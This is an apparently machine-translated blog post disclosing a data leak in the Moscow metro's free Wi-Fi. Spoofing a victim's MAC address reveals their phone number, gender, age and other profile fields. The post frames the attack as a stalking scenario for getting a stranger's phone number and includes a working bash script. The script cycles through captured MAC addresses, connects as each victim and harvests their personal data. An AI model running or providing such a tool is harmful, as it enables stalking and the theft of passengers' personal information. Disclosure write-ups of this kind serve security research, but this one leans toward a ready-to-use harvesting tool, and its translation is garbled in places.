How again you can’t get the phone of (almost) any beauty in Moscow, or an interesting feature of MT_FREE

UPD0 03/14 8:21 - Phone no longer receive. Other interesting data has remained.

UPD1 14.03 10:39 - In order not to denigrate the guys from the MaximaTelecom support : I reported it in roundabout ways, but asked about it five times and clarified whether my letter reached the addressee - in short, I made sure that it was at the ephemeral (names asked to be silent) responsible over wafer faces in the subway. I admit that this is stupid, but the chain "problem in mosmetro" → "I already had connections with every mos, I need to call them" seemed to me very, very logical at the time of detection of the vulnerability.

UPD2 03/14 15:40 - The vulnerability was found in uid Antxak - the bottom line is that in uid lies the md5 of the phone without salt. Again you can search for phones.

Example of a mined phone


UPD3 03/14/18:55 - The vulnerable hash in the uid has been replaced with the same as in the phone. Until they split the latter.

UPD4 03/15 20:51 - Values ​​and keys of almost all fields have been replaced with presumably obfuscated ones.

Example for UPD4
"f1509df640" : "2808dfd5",
   "groups" : [
   "c760cf1502" : "1c0066f3",
   "2147e37a8a" : "159961e5",
   "5777de2cd9" : "fd5a4e2f",
   "tags" : [
   "843539b896" : "",
   "857696ce09" : "a5ff55e9",
   "train" : "",
   "5e97672e80" : "7dce1b03",
   "cec952789d" : null,
   "dmpSegments" : [],
   "place" : "",
   "f4befe4ab6" : "144:149",


In the Moscow metro there is such a wonderful thing as free wifi.
The only thing you need to enter it is to enter your phone number. And since the metro is a convenient thing, but often a long one, almost everyone uses the free network. In this interesting world, we liked the girl at the opposite table.

Small vulnerability

Authorization in this network is tied to the poppy address, which can always be changed - for example, to anyone caught in the air around. You can catch mac addresses, for example, with the airodump-ng utility . Sometimes you can even enter wi-fi without watching an ad if the real owner of the mac address has paid premium access.

Draining about yourself

But if you are not among those who paid for wi-fi, then you will be greeted with the page when connecting. In addition to advertising, this page gives away one interesting json, which contains a bunch of interesting information about the currently connected user.

Even if you paid for premium access, this page can always be opened by simply typing the address in the browser.

A lot of interesting information
   "dmpSegments" : [],
   "clicker_status" : -1,
   "gender" : "F",
   "place" : "",
   "premium_groups" : {
      "premium_vip_status" : -1,
      "mosmetro_premium_short_status" : -1,
      "mosmetro_premium_status" : 1
   "line_id" : "99",
   "family_status" : "not married",
   "autoapp_status" : 0,
   "premium" : true,
   "autoapp_user" : null,
   "age" : "4500",
   "interests" : "307",
   "train" : "",
   "device_price" : "",
   "mac" : "98-00-**-**-b3-66",
   "ip" : "",
   "groups" : [
   "home_station" : "192:193",
   "msisdn" : "7925*****03",
   "occupation" : "student",
   "profit" : "medium",
   "clicker" : null,
   "tags" : [
   "avocation" : "oywh4JCyQYOMHLy8ZM5AXqMZNhal0pDJl-OqBtuq09T5oBLS44GveLog8sWGm3ILB81zUC0mvW_l51J9ykx1kA==",
   "current_station" : null,
   "mnc" : "02",
   "uid" : "********",
   "job_station" : "57",
   "groups_data" : {
      "mosmetro_basic" : {
         "endDate" : null,
         "state" : 1
      "mosmetro_premium" : {
         "state" : 1,
         "endDate" : null
      "mgt_basic" : {
         "state" : 1,
         "endDate" : null
      "cppk_basic" : {
         "endDate" : null,
         "state" : 1

I note that the phone number is not covered by asterisks in real data.

And, actually, how to find out the number of a beauty

I am pretty sure that you all guessed how our script would go.

Eve really wants to know Alice's phone at the opposite table (forbidden love!). Like most people in Moscow, using a telephone, Alice also uses the MT_FREE network.

Eve has been following Alice for a while, and recognizes her MAC using the airodump-ng utility, widely available and working on almost any waffle iron. Having recognized him, she follows the metro, changes her poppy to Alice's poppy, opens the page and receives the desired number.

I'm too lazy to even check it

But wait, potential Eve! To simplify the work of sorting out dozens of poppies from an eatery in finding a phone your painstaking study of wi-fi security, I made a little script! You can find it at the bottom of the article.

To be continued?

Getting user data so far only works in the subway, because remotely I still have not managed to convince the server that my poppy is not 00: 00: 00: 00: 00: 00. It used to be possible to pass a poppy in the client_mac parameter, but I have not found an analogue yet.


I reported the vulnerability (probably it was done before me, this thing is obvious until impossible) a week ago, and without receiving any answer, I decided to disclose it here.

All of the disclaimer described above is written on behalf of a fictional character, and is fiction. His motives do not coincide with mine, and I do this solely for research purposes. And I don’t even understand what to do with the phone of the beauty who didn’t give it to me.

I will not point to the manual using airodump-ng, so as not to reduce the level of entry to completely zero.


For those who just look
# script for finding userdata from a list of macs.
# for educational purposes only, of course.

! sudo -p "we require sweet root juices to run, please let us in: " echo -n && exit 1

OUTDIR=check-`date +%d-%m-%yT%H:%M:%S`

[ ! -e $INPUT ] && { echo 'no input'; exit 1; }
[ -z $SSID ] && { echo 'no connection'; exit 1; }

function progress() { echo -ne "\033[K"$1"\033["${#1}"D"; }
function status() { echo -e "\033[K$1"; }

function current_userdata() {
    rm .ck 2> /dev/null
    curl --retry 3 -s -b .ck -c .ck '' > /dev/null 2>&1
    curl --retry 3 -s -b .ck -c .ck '' 2>/dev/null | grep userData | grep -oP '(?<=JSON.parse\(\").*?(?=\")' | sed 's/\\&quot;/"/g' | json_pp
    rm .ck

function oui() {
    if [ -e /var/lib/ieee-data/oui.txt ]; then
        MACINFO=`grep $OUIMAC /var/lib/ieee-data/oui.txt`
        # getting naame (it's always 22 symbols away from the start)
        # removing \r on the end
        echo -n ${MACINFO[@]:0:-1}

tput civis

function on_exit() {
    tput cnorm
    echo "turning wifi back on"
    nmcli dev set $DEV managed true
    nmcli dev set $DEV autoconnect true

trap on_exit EXIT

mkdir $OUTDIR

echo "turning wifi on $DEV off for nmcli for now"

# turning it off in nmcli
nmcli dev set $DEV managed false >/dev/null 2>&1
nmcli dev set $DEV autoconnect false  >/dev/null 2>&1

for MAC in $(cat $INPUT); do
    echo -en "\033[2m"$MAC"\033[0m"' : '

    progress "switching..."
    sudo iw dev $DEV disconnect 2>/dev/null
    sudo ip link set $DEV down
    if ! sudo ip link set $DEV address $MAC > /dev/null 2>&1; then
        status "failed to set mac?"
        echo $MAC >> $OUTDIR/not-macs.txt
    sudo ip link set $DEV up

    progress "connecting..."

    for try in {1..3}; do
        progress "try $try..."
        if sudo iw dev $DEV connect -w $SSID | grep connected >/dev/null 2>&1 ; then

    if ! [ $CON_SUCCESS ]; then
        status "failed to connect to wi-fi"
        echo $MAC >> $OUTDIR/no-assoc-macs.txt

    progress "getting ip..."

    if ! sudo dhclient -1 $DEV; then
        status "DHCP failed"
        echo $MAC >> $OUTDIR/no-ip-macs.txt

    progress "userdata..."

    current_userdata 2>/dev/null > $USERDATA

    if [ -s $USERDATA ]; then

        AGE=`cat $USERDATA | grep -Po '(?<=age\"\ \:\ \").*?(?=\")'`
        PHONE=`cat $USERDATA | grep -Po '(?<=msisdn\"\ \:\ \").*?(?=\")'`
        PREMIUM=`cat $USERDATA | grep -Po '(?<=premium\"\ \:\ )\w*'`
        GENDER=`cat $USERDATA | grep -Po '(?<=gender\"\ \:\ \").*?(?=\")'`
        OUI=`oui $MAC`

        # just adding some more highlight to that sweet mark of ad-free wifi mac goodness
        if [ $PREMIUM == true ]; then
            echo $MAC >> $OUTDIR/good-macs.txt

        status "got userdata \033[36m{ msisdn: ${PHONE}, age group ${AGE}, gender: ${GENDER}, premium: ${PREMIUM}, vendor: $OUI }\033[0m "
        status "no userdata"
        rm $USERDATA
        echo $MAC >> $OUTDIR/no-reg-macs.txt


Work example

Пример работы скрипта

GitHub Gist Script Link

For the script to work from dependencies, only curl, json_pp is needed, and it is advisable to have a new oui.txt in / var / lib / ieee-data / (download from here )

The default interface is wlp1s0.

./ get-userdata returns user data for the current connection

Thanks for reading!

UPD: updated dependencies
UPD: replaced ifconfig with ip (thanks, bykvaadm ), added the ability to change the interface without changing the script